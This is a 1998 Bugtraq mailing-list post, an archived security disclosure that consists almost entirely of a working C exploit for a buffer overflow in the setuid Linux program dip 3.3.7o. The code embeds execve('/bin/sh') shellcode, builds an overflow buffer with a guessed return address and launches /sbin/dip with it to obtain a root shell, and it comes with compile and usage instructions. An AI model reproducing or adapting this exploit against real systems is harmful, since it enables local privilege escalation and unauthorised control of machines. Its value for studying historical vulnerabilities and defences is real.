Bugtraq mailing list archives
dip 3.3.7 exploit
From: jamez () UGROUND ORG (jamez)
Date: Thu, 7 May 1998 20:06:47 +0000
Here is an exploit for the dip 3.3.7o buffer overflow.

----- cut here -----
/*
 * dip 3.3.7o buffer overflow exploit for Linux. (May 7, 1998)
 * coded by jamez.
 * e-mail: jamez () uground org
 * thanks to all ppl from uground.
 *
 * usage: gcc -o dip-exp dip3.3.7o-exp.c
 *        ./dip-exp offset   (-100 to 100, probably 0. tested on slack 3.4)
 */

#include <stdio.h>
#include <stdlib.h>   /* atoi */
#include <string.h>   /* strlen */
#include <unistd.h>   /* execl */

/* Linux/x86 execve("/bin/sh") shellcode, followed by exit() */
char shellcode[] =
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/sh";

#define SIZE 130        /* since it's a small buffer, I won't use NOPs */

char buffer[SIZE];

/* Returns the current stack pointer (result is left in %eax; 32-bit x86 gcc only) */
unsigned long get_esp(void)
{
    __asm__("movl %esp,%eax");
}

int main(int argc, char *argv[])
{
    int i = 0, offset = 0;
    long addr;

    if (argc > 1)
        offset = atoi(argv[1]);

    /* guessed address of the shellcode on the stack of the target */
    addr = get_esp() - offset - 0xcb;

    /* shellcode first, then the rest of the buffer filled with the return address */
    for (i = 0; i < strlen(shellcode); i++)
        buffer[i] = shellcode[i];

    for (; i < SIZE; i += 4) {
        buffer[i]     =  addr & 0x000000ff;
        buffer[i + 1] = (addr & 0x0000ff00) >> 8;
        buffer[i + 2] = (addr & 0x00ff0000) >> 16;
        buffer[i + 3] = (addr & 0xff000000) >> 24;
    }
    buffer[SIZE - 1] = 0;

    /* pass the buffer as the -l argument of the setuid dip binary */
    execl("/sbin/dip", "dip", "-k", "-l", buffer, (char *)0);
    return 0;
}
----- cut here -----

--
jamez () uground org